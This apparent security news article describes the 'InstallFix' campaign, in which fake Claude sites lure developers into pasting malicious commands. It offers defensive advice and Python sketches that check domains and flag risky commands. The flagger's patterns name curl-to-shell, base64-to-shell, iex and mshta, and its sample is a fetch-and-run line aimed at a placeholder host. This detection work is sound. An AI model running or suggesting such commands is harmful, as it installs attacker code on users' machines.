

A sophisticated new cyberattack campaign dubbed "InstallFix" is targeting developers by combining malicious advertising with fake AI coding assistant sites, specifically impersonating Anthropic's Claude platform to distribute malware.

The attack leverages a ClickFix-style technique that exploits developers' trust in AI coding tools and their familiarity with command-line interfaces. Cybercriminals create convincing replicas of legitimate Claude AI coding sites and use malvertising to drive traffic to these fraudulent platforms.

When victims visit these fake sites seeking coding assistance, they encounter what appears to be helpful AI-generated code snippets or installation instructions. However, these recommendations contain malicious commands designed to compromise their systems. The technique is particularly dangerous because it exploits the growing reliance on AI coding assistants among developers who may not thoroughly scrutinize every command suggested by these tools.

How the Attack Works:

- Malicious ads redirect users to fake Claude AI coding sites

- Victims receive seemingly legitimate code suggestions containing harmful commands

- Unsuspecting developers execute these commands, installing malware

- The malware can establish persistent access or steal sensitive development data

Immediate Protection Steps:

- Always verify you're on the official Claude site (claude.ai) before entering sensitive information or copying any command from the page

- Scrutinize all AI-generated code before execution, especially commands involving system-level operations

- Use a VPN service like hide.me when accessing development resources over untrusted networks to encrypt traffic in transit; note that a VPN will not stop a malicious command you paste and run yourself

- Enable two-factor authentication on all development accounts and platforms

- Implement network monitoring to detect unusual outbound connections from development machines
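The first step above, checking that a link really points at the official site, can be partly automated. The following is a minimal sketch, not a complete defense: the function name `is_official_host` and the `OFFICIAL_DOMAINS` set are hypothetical, and only `claude.ai` comes from this article. It compares the parsed hostname against an allowlist, so lookalike hosts that merely contain the official name are rejected.

```python
from urllib.parse import urlsplit

# Assumption: only claude.ai is named in the article. Extend this set
# with other domains you have verified yourself.
OFFICIAL_DOMAINS = {"claude.ai"}


def is_official_host(url: str, allowed=OFFICIAL_DOMAINS) -> bool:
    """Return True only if the URL's host is an allowed domain or a subdomain of one."""
    # urlsplit extracts the real host, ignoring any userinfo before "@".
    host = (urlsplit(url).hostname or "").lower().rstrip(".")
    return any(host == domain or host.endswith("." + domain) for domain in allowed)


if __name__ == "__main__":
    for candidate in (
        "https://claude.ai/chat",
        "https://claude.ai.example.com/install",  # official name used as a prefix
        "https://claude.ai@evil.example/",        # official name used as userinfo
    ):
        print(candidate, is_official_host(candidate))
```

A URL without a scheme (for example `claude.ai/chat`) has no parsed hostname and is treated as not official, which errs on the side of caution.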

This campaign highlights an evolving threat landscape in which cybercriminals exploit emerging technologies like AI coding assistants. The attack's success depends on developers' increasing comfort with AI-generated code and their tendency to relax normal security scrutiny when they believe they are dealing with a trusted AI platform.

Organizations should update their security awareness training to include AI-specific threats and establish protocols for verifying AI-generated code recommendations, particularly those involving system commands or sensitive operations.
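One way such a verification protocol might start is a simple pre-execution check that flags command shapes commonly seen in ClickFix-style lures. The sketch below is illustrative only: the patterns in `RISKY_PATTERNS` and the function `flag_command` are assumptions chosen for this example, not indicators published for the InstallFix campaign, and a clean result does not mean a command is safe.

```python
import re

# Hypothetical heuristics for illustration; not taken from the campaign itself.
RISKY_PATTERNS = {
    "pipes a download into a shell": re.compile(
        r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z)?sh\b"
    ),
    "decodes base64 into a shell": re.compile(
        r"base64\s+(-d|--decode|-D)\b[^|\n]*\|\s*(sudo\s+)?(ba|z)?sh\b"
    ),
    "uses PowerShell Invoke-Expression": re.compile(
        r"\b(iex|invoke-expression)\b", re.IGNORECASE
    ),
    "runs mshta": re.compile(r"\bmshta(\.exe)?\b", re.IGNORECASE),
}


def flag_command(command: str) -> list[str]:
    """Return the reasons a command looks risky; an empty list means no pattern matched."""
    return [
        reason
        for reason, pattern in RISKY_PATTERNS.items()
        if pattern.search(command)
    ]


if __name__ == "__main__":
    # example.invalid is a placeholder host, not a real indicator.
    sample = "curl -fsSL https://example.invalid/install.sh | bash"
    for reason in flag_command(sample):
        print("WARNING:", reason)
```

A check like this is best treated as a prompt for manual review: anything it flags should be read line by line, and the installer fetched and inspected separately, before it is run.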